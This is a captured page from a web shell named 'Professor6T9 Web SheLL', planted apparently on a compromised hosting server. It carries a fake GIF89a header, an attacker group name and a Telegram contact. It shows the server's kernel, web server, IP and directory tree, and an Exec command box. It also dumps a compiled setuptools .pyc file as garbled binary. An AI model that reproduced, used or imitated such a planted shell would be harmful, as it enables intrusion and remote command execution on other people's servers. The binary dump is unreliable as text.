GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
File Name : build_py.cpython-312.pyc
� t��e�@ � �r � d Z ddlZddlZddlZddlZddlmZ ddlm Z m Z ddlmZ ddl mZ G d� d e� Zy) zHdistutils.command.build_py Implements the Distutils 'build_py' command.� N� )�Command)�DistutilsOptionError�DistutilsFileError)�convert_path)�logc � � e Zd ZdZg d�ZddgZddiZd� Zd� Zd� Z d � Z d � Zd� Zd� Z d � Zd� Zd� Zd� Zd� Zd� Zd� Zdd�Zd� Zd� Zd� Zd� Zy)�build_pyz5"build" pure Python modules (copy to build directory)))z build-lib=�dzdirectory to "build" (copy) to)�compile�czcompile .py to .pyc)� no-compileNz!don't compile .py files [default])z optimize=�Ozlalso compile with optimization: -O1 for "python -O", -O2 for "python -OO", and -O0 to disable [default: -O0])�force�fz2forcibly build everything (ignore file timestamps)r r r c �t � d | _ d | _ d | _ d | _ d | _ d| _ d| _ d | _ y )Nr )� build_lib� py_modules�package�package_data�package_dirr �optimizer ��selfs ��/builddir/build/BUILDROOT/alt-python312-setuptools-69.0.2-1.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/setuptools/_distutils/command/build_py.py�initialize_optionszbuild_py.initialize_options# s<